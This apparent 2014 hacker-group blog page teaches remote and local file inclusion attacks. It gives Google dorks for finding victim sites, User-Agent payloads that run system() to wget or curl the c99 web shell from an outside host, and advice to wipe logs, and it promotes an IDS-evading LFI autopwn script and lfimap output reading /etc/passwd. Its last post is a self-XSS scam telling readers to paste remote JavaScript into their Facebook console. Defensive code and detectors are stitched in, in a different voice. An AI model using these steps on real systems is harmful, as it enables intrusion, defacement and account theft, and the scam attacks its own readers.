1ND14N H4X0R5 T34M (IHT) JAI HIND JAI BHARAT

We are :- DeadManINDIA,Null_Port_Govind,Haxor Rahul,EagleShadow,Karate-Katrina,Spy-Hunter,Grey-Noob,Mr.R@66!T.

A big salute to our Indian armies

Freedom is not free. Our soldiers give their lives for us.

We are Indians and we are proud to be Indians.

India is great, because it is the one place in the world where people respect all religions.

Kali is a good OS for hacking

People say this OS is best, that OS is best, but no OS is like Kali Linux.

MOM and DAD

I can't see God, but when I see my MOM and DAD I think God is in them. They are my Gods. Love you MOM and DAD.

Thursday, 20 March 2014

RFI Full Tutorial For All New N00bs

Intro: What is RFI??



RFI means Remote File Inclusion.
RFI is a type of web application security hole.
On the net there are many sites which are vulnerable to RFI.

In this tutorial, I am going to show you RFI with PHP.
PHP is a web scripting engine. It's the most widely used one, which is why I am using it in this tutorial.

Learn more about PHP: http://php.net

http://en.wikipedia.org/wiki/PHP


To understand what file inclusion is I am going to show a little example.
This is an example site in PHP:




PHP Code:
<?php $content = "Hello and welcome to the site"; ?>
<html><head><title>Hello world</title></head><body>
<?php echo($content); ?>
</body></html>


This is a very basic page. But as your site expands you might
want to put the individual pages in their own files and include them in
the main file depending on user input.
This way, when you have pages with perhaps 10k lines of PHP code, you don't have to spend hours looking
for the bit of code you want to edit or view.

By user input I mean things like a URL GET argument. A GET argument could look like this:

www.site.com/index.php?page=index

In the above example the PHP script would see “page=index” and then show the content of “index”. The “index” can be anything: a file, an SQL value, a hard-coded variable. If it is a file, then the PHP script is most likely using the include() function, and that is file inclusion.


1.Understanding RFI

So, in the above text I said that file inclusion is including files in another file. Well, that is all right, but what does that actually mean?

Well, let's say we have 2 files:
index.php
content.php

The index.php is the file people are going to view when they visit my page, www.site.com as usual. But we want index.php to display the contents of content.php without the user actually visiting content.php.

All you would need to do is put this PHP script in index.php:

PHP Code: <?php include("content.php"); ?>

Now we are showing the contents of content.php when the user visits index.php. If content.php contained more PHP code, it would also get executed.

That is it. We just did file inclusion! However, this example is just a dummy page and would most likely not be found in real life.


Let's create a new, more realistic scenario. We have the following files/pages:

index.php
1.php
2.php
3.php

Now, index.php is again the file the users are going to visit. On the default index we are going to display 3 links.

www.site.com/index.php?page=1
www.site.com/index.php?page=2
www.site.com/index.php?page=3

When the user clicks the first link it's going to show the content of 1.php, when the user clicks the second link it's going to show the contents of 2.php, and when the user clicks the last link it's going to show the contents of 3.php.

The index.php script would in this case look something like this (note that I am now deliberately coding carelessly to create a security hole):

PHP Code:
<?php
if (isset($_GET['page'])) {
   include($_GET['page'] . ".php");   // the value of ?page= goes straight into include()
} else {
   echo('<p><a href="index.php?page=1">page1</a></p>');
   echo('<p><a href="index.php?page=2">page2</a></p>');
   echo('<p><a href="index.php?page=3">page3</a></p>');
}
?>

The content of 1, 2 and 3 is not important in this example, so I won't say anything about that.

Now, when a user clicks the page1 link he or she is taken to www.site.com/index.php?page=1

The PHP script in index.php will now see that the user is requesting the page called 1 and it will include the number in the URL + “.php”. The same goes for 2 and 3.


Now, what is this “Remote” part in RFI all about? Well, this belongs more in the “exploiting RFI vulnerabilities” part of this tutorial, but I have to say something short about it now.

The above code is vulnerable to RFI. You can test this by visiting:
www.site.com/index.php?page=4

That would give us an error (assuming the server administrator has not turned off “show errors” in the PHP configuration). The error would look something like this:
Warning: include(page4.php) [function.include]: failed to open stream: No such file or directory in PATH on line 3
Warning: include() [function.include]: Failed opening 'page4.php' for inclusion (include_path='.;PATH') in PATH\index.php on line 3

This would tell us that the include() function used in this script is not secured and can be exploited. The way you exploit it is by getting it to include your code so that you can control the server. This is where the “remote” part of RFI comes in. You can create a PHP script, save it as .txt, upload it to a server and then visit something like this:

http://www.site.com/index.php?page=http://hacker.com/shell.txt?

Note that the ? is there to get rid of the “.php” at the end, since we did not name the file .txt.php. Also, if you were to try to include a .php file from a remote server, you would only get the executed output of the PHP file.

Now we have successfully put our code into the PHP engine of the victim server, and we are free to do whatever you can do with PHP, which is almost anything.


2.Finding RFI vulnerabilities


As said above, to check for the most basic vulnerabilities all you need to do is manipulate the GET arguments and look for error messages like the one above. For more advanced ones you might need to try things out; this is called blind RFI. As you gain more knowledge about PHP and RFI you will understand how to perform blind RFIs.

Here are a few examples of GET argument manipulation:

www.site.com/index.php?id=1
www.site.com/index.php?id=1asdfsaf
www.site.com/index.php?id=index
www.site.com/index.php?id=fuckkkk
www.site.com/index.php?id=lolzzzz


Use your imagination... And for those who did not understand: the argument does not need to be “id” or “page” or “site”. It can be anything.

There are more advanced versions of RFI like POST argument RFI, cookie RFI, HTTP header RFI and so on. But these should be easy to understand once you gain more knowledge about the HTTP protocol, TCP/IP, HTTP servers, PHP etc.

3.Exploiting RFI vulnerabilities


Let's say that you have successfully found a vulnerable page.

The URL is www.site.com/index.php?page=index

The PHP script is made in such a way that we only need to change page=index to page=http://hacker.com/shell.txt, and now our PHP code is over on the victim's server and executes.

What you should do now is try to make something called a shell. A shell is essentially just a PHP script that can perform Explorer-like actions: read/write/edit/create files, navigate folders, etc. Some shells even have built-in exploits to gain root access on the server, but that's another story.

Now, there is a truckload of premade shells out there, but I really recommend creating your own, as it is good learning and most shells are actually detected by antivirus, believe it or not. So if the server you are trying to access has an antivirus it will not work, and it might spoil your attack.

4.Securing RFI vulnerabilities


Secure user inputs!!!! And not just those you THINK are used in SQL queries or include functions. ALL user inputs should be secured. You do this by stripping or disallowing words, phrases or symbols in the user inputs. The most common solution when it comes to RFI is just to make the page less dynamic and hardcode the pages. If you still want a dynamically editable page you MUST make sure you secure the user inputs. Check it for the word “http”, check it for “www.”, check it for “../”, check it for “?” etc. Disable “show PHP errors” in the PHP configuration. Do a file_exists() check. These are all easy things you can do to prevent RFI (and LFI, but that is again another story).

Here is an example of a dynamic page and a hardcoded page. The dynamic one is not secure; the hardcoded one is.

Dynamic:
PHP Code:
<?php
if (isset($_GET['page'])) {
   include($_GET['page'] . ".php");   // user-controlled include: this is the RFI hole
} else {
   echo('<p><a href="index.php?page=1">page1</a></p>');
   echo('<p><a href="index.php?page=2">page2</a></p>');
   echo('<p><a href="index.php?page=3">page3</a></p>');
}
?>

Hardcoded:
PHP Code:
<?php
if (isset($_GET['page']))
{
   // compare against the exact values the links below send ("1", "2", "3");
   // anything else is ignored, so a remote URL or a path never reaches include()
   if ($_GET['page'] == "1")
      include("1.php");

   if ($_GET['page'] == "2")
      include("2.php");

   if ($_GET['page'] == "3")
      include("3.php");
}
else
{
   echo('<p><a href="index.php?page=1">page1</a></p>');
   echo('<p><a href="index.php?page=2">page2</a></p>');
   echo('<p><a href="index.php?page=3">page3</a></p>');
}
?>
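As an added example (not code from the post), here is the allowlist idea behind the hardcoded page written as a stand-alone Python function, so it can be run against the values the tutorial uses; the directory and page names are hypothetical.

```python
import os
from urllib.parse import unquote

# Constructed values for the example, not taken from any real site
PAGES_DIR = "/srv/site/pages"               # hypothetical directory holding 1.php, 2.php, 3.php
ALLOWED_PAGES = {"1", "2", "3", "index"}    # the only names index.php should ever include


def vulnerable_target(raw_param: str) -> str:
    """What the dynamic version, include($_GET['page'] . ".php"), tries to open.

    Shows why the trailing '?' trick in the tutorial works: the appended
    ".php" simply becomes part of the remote URL's query string.
    """
    return raw_param + ".php"


def check_page_param(raw_param, allowed=ALLOWED_PAGES, base_dir=PAGES_DIR):
    """Return (path_to_include, None) if the value is acceptable, else (None, reason).

    This is the allowlist behind the "hardcoded" page above, plus a
    path-containment check as defence in depth.
    """
    if raw_param is None:
        return None, "missing"
    name = unquote(raw_param)                 # decode once more in case the value was double-encoded
    if "\x00" in name:
        return None, "null_byte"              # a null byte could truncate the ".php" suffix on old PHP builds
    if name not in allowed:
        # One comparison rejects "http://...", "../..", "/etc/passwd" and
        # "shell.txt?" alike; no need to blocklist "http", "www." or "../".
        return None, "not_allowlisted"
    candidate = os.path.realpath(os.path.join(base_dir, name + ".php"))
    base = os.path.realpath(base_dir)
    if os.path.commonpath([base, candidate]) != base:
        return None, "outside_base"           # even an allowlisted name must resolve under base_dir
    return candidate, None


if __name__ == "__main__":
    for value in ("1", "4", "http://hacker.com/shell.txt?", "../../../../../etc/passwd", "1%00"):
        print(repr(value), "->", vulnerable_target(value), "|", check_page_param(value))
```

Keep allow_url_include=Off in php.ini as well (it is off by default): with it off, include() refuses http:// and ftp:// URLs regardless of what the script does.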

LFI with perl script :D

Source Download from here

Features

  • Signature-free
  • Session Splicing
  • User-Agent and Log injection
  • Arithmetic Test

Usage

 perl lfi_autopwn.pl -h www.vuln.tld -u "/vuln.ext?page=main&foo=bar" -i page
This script will attempt to gain code execution on sites vulnerable to local file inclusion via an httpd error log or by modifying the user-agent and including a file containing environment variables. The php code execution test is performed using an arithmetic challenge, and the script uses system() as its php execution function. The fact that every part of this process is randomized including the math challenge prevents signature based detection while LibWhisker provides IDS Evasion.
Notice: It is possible that this script will not work on your intended target but tests positive for php execution. In that case, changing your bash command execution function from system to one of many others is most likely to yield the desired results.
Protip: Make sure you've saved httpdlogs.conf to the same directory as lfi_autopwn.pl.


httpdlogs.conf

The httpdlogs.conf file dictates filenames for possible error log locations.
If you know any filenames that aren't listed here, feel free to add them to your local copy. Files are simply separated by newlines.
  • ./err.log
  • ./error_log
  • ./error.log
  • /etc/httpd/conf/logs/error_log
  • /etc/httpd/logs/error_log
  • /home/php5/logs/error_log
  • ../log/error_log
  • ../log/error.log
  • ../logs/error_log
  • ../logs/error.log
  • /proc/self/fd/2
  • /usr/local/apache2/log/error_log
  • /usr/local/apache2/logs/error_log
  • /usr/local/apache2/logs/error.log
  • /usr/local/apache/error.log
  • /usr/local/apache/log/error_log
  • /usr/local/apache/logs/error_log
  • /usr/local/apachessl/logs/dummy-host.example.com-error_log
  • /usr/local/apachessl/logs/error_log
  • /usr/local/httpd/log/error_log
  • /usr/local/httpd/logs/error_log
  • /usr/local/php/log/error_log
  • /var/log/apache2/error_log
  • /var/log/apache2/error.log
  • /var/log/apache/error_log
  • /var/log/httpd-error.log
  • /var/log/httpd/error_log
  • /var/log/nginx/error.log
  • /var/log/php-fcgi/error_log
  • /var/log/php-fpm/err.log

Other Execution/Interesting PHP Functions

php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abort, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpassthru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix_getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo

From the defender's side, these are the names that usually go into the disable_functions directive in php.ini.

How to use lfimap tool for LFI :D

Installation

$ cd /data/src/
$ wget http://lfimap.googlecode.com/files/lfimap-1.4.8.tar.gz
$ mkdir -p /pentest/web/
$ tar xvzf lfimap-1.4.8.tar.gz -C /pentest/web/

Usage

Syntax

$ python lfimap.py -t <target> [options]

Options

--target, -t <target>: target URL, e.g. http://www.test.com/ss.php?page=[LFI HERE]
--null, -n: append a null byte to bypass some controls
--user, -u <user>: username for HTTP basic authentication
--passw, -p <password>: password for HTTP basic authentication
--proxy, -w <proxy>: proxy support
--output, -o <file>: output file
--hexa, -x: hex-encode the URL

Examples

Example #1: PoC

Description

The following example is based on a specific vulnerable code (download it here) that doesn't properly check/sanitize user inputs and is hence vulnerable to LFI attacks. LFIMap has been tested against this application as a Proof of Concept.

Stdout

LFIMap has been called with following parameters:
$ python lfimap.py -t "http://127.0.0.1/poc/LFI/index.php?page=page2.txt" -o report.html
Here is the output on the screen:
 lfi detected in "page" parameter
--------------------------------------------------------------------
Made by Augusto Pereyra
Thanks to www.artsweb.com.ar
This code is distributed under GPL Licence
Detecting root path of site
--------------------------------------------------------------------

Going down 0 folder
Going down 1 folder
Going down 2 folder
Going down 3 folder
Going down 4 folder
Going down 5 folder
root path finded in: 
-------------------------------------------------------------
http://127.0.0.1/poc/LFI/index.php?page=../../../../../&
 The root of the File system was found 6 levels down
 This is a Linux System
-------------------------------------------------------------
2011-02-03 06:52:45.401371
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../proc/version&
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/apache2/apache2.conf&
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/mysql/my.cnf&
Possible password detected in this file
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/sysctl.conf&
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/passwd&
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/ts.conf&
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/ca-certificates.conf&
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/debconf.conf&
Possible password detected in this file
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/bash_completion.d/debconf&
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/xdg/user-dirs.conf&
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/gnome-vfs-2.0/modules/default-modules.conf&
(...TRUNCATED...)

Generated report

Here is an extract of the generated html report:
[Image: extract of the lfimap-generated HTML report]

Proof of Concept

By clicking on one of the links from the generated html report, here is the proof of concept. We can see that the application is vulnerable to LFI attacks.
[Image: lfimap proof of concept, a file read through the vulnerable page]

Tuesday, 18 March 2014

How to hack a website with Local file inclusion or LFI


To find a vulnerable website, we will be using what is known as a Google 'dork' (simply a Google search for a specific string or term to yield the desired results). All you have to do is paste the dork into Google search, and see what you find!


allinurl:index.php?page=


Essentially you can replace 'index' and 'page' with whatever words you want and then search for that.

For example, you can use:


allinurl:site.php?site=


Once you paste your dork into Google, you should come up with a list of websites which contain that URL; simply go to one of these and then follow the steps below!

NOTE: Few sites are vulnerable to LFI, but they do exist! You just have to keep searching until you find one.

So, let's say that we find the following site using our dork:

http://www.site.com/index.php?page=contacts.php



What we're going to do is replace contacts.php with 'null', so that you get the following:

http://www.site.com/index.php?page=null



If you see a list of errors running down the page, or missing content (pictures, text etc.), then the site is vulnerable and we may continue, otherwise just move on to the next site.

Now, we're going to try and connect to a file which we know exists on Linux servers, /etc/passwd.

Since index.php has the rights to open a file like contacts.php, it's possible that the administrator has forgotten to restrict its access to other files, including the files containing sensitive data.

We're going to try to read the file "/etc/passwd", which contains data on the root user and the other accounts.

So, now change your URL to:

http://www.site.com/index.php?page=/etc/passwd



If you see a large list of data appear, then that's great, the site is completely vulnerable to LFI, and you've pretty much got this in the bag.

If you don't see this data, but get a 403 error or more errors, then move on to another site.

Now, change your URL again to:

http://www.site.com/index.php?page=/proc/self/environ



If you now see a new set of data, that's great.

If somewhere in the data the following is shown, then that's even better.




DOCUMENT_ROOT=((Random value here))


If not, unfortunately you'll have to move on, there are ways to circumvent this, but I'm keeping this tutorial as basic as I can.

Now, open up Tamper Data, and change your User Agent value to the following:




<?system('id');?>


This is basic PHP code to check if we can execute code on the vulnerable machine.
The page should refresh, and your DOCUMENT_ROOT value should have changed; if it didn't, go for another website.
Now change your User Agent again, this time to




<?system('uname -a');?>


If your User Agent changes again, great.
Now we're going to upload a shell, which will grant us full control of the site, and the ability to deface / root / whatever the fuck you feel like doing.
Change your user agent to the following:




<?system('wget http://www.sh3ll.org/c99.txt -O secret.php');?>


What the above command does is save a text copy of a powerful PHP shell, 'C99', under the name secret.php.
Note: If the above wget command does not work, you should try curl instead:




<?system('curl -o shell.php http://www.sh3ll.org/c99.txt');?>


Now navigate to your shell, which should be at the following directory:

http://www.site.com/secret.php



NOTE: If your website's vulnerable page was something like

http://www.site.com/dir/dir/dir/index.php?page=contacts.php



Then your shell will be at the directory of the index.php, so for the above case, you will find it at:

http://www.site.com/dir/dir/dir/secret.php



Now that your shell is uploaded, go nuts!

Don't forget to wipe the logs before you leave -- IMPORTANT.

Good luck and have fun!
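Added example, not part of either tutorial: a small Python detector that reads Apache combined-format access log lines and flags the probes described in section 2 of the RFI tutorial and in the LFI steps above (a remote URL in a parameter, directory traversal or a direct path to /etc/passwd or /proc/self/environ, a PHP tag in the User-Agent, a null byte). The log lines, the IP address and the hostnames are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines: one benign request, then the probes the tutorials describe
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Mar/2014:10:00:01 +0000] "GET /index.php?page=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Mar/2014:10:00:02 +0000] "GET /index.php?page=http://hacker.com/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Mar/2014:10:00:03 +0000] "GET /index.php?page=../../../../../etc/passwd HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Mar/2014:10:00:04 +0000] "GET /index.php?page=/proc/self/environ HTTP/1.1" 200 512 "-" "<?system(\'id\');?>"',
    '203.0.113.5 - - [18/Mar/2014:10:00:05 +0000] "GET /index.php?page=page2.txt%00 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# Apache "combined" log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_RE = re.compile(r'^\s*(https?|ftp|php|data)://', re.I)   # stream wrappers include() can open
SENSITIVE_RE = re.compile(r'/(etc/passwd|proc/self/environ|var/log/[^&]*)', re.I)


def classify_value(value: str) -> set:
    """Tags for one decoded query-string value."""
    tags = set()
    if "\x00" in value:
        tags.add("null_byte")            # old-PHP trick to drop an appended ".php"
    if REMOTE_RE.match(value):
        tags.add("rfi")                  # include() pointed at a remote URL
    if "../" in value or "..\\" in value or value.startswith("/") or SENSITIVE_RE.search(value):
        tags.add("lfi")                  # traversal or a direct path to a local file
    return tags


def classify_request(target: str, user_agent: str) -> set:
    """Tags for one request line's target URL and User-Agent header."""
    tags = set()
    query = urlsplit(target).query
    # parse_qsl decodes once; unquote again so double-encoded probes are seen too
    for _, value in parse_qsl(query, keep_blank_values=True):
        tags |= classify_value(unquote(value))
    if "<?" in user_agent:               # PHP tag in the UA: log poisoning / proc/self/environ abuse
        tags.add("ua_php_tag")
    return tags


def scan_log(lines):
    """Return (ip, target, tags) for every parsable line that carries at least one tag."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m["target"], m["ua"])
        if tags:
            findings.append((m["ip"], m["target"], tags))
    return findings


if __name__ == "__main__":
    for ip, target, tags in scan_log(SAMPLE_LOG):
        print(ip, sorted(tags), target)
```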

Monday, 17 March 2014

How to find your profile visitors


#Use Google Chrome
1- Copy all the code from http://pastebin.com/raw.php?i=WwqLxmYe
2- Go to your profile (not the home page)
3- Press F12, or right click > Inspect Element > Console.
4- Paste the whole script with Ctrl+V.
5- Press "ENTER".
Wait 3-4 minutes and you will know who is visiting your profile.
NOTE: If the application is not working, go to http://www.facebook.com/selfxss and tick the checkbox reading "Allow My Account to be hijacked if I paste the malicious JavaScript". If it fails or a warning appears, ignore it, refresh and try again.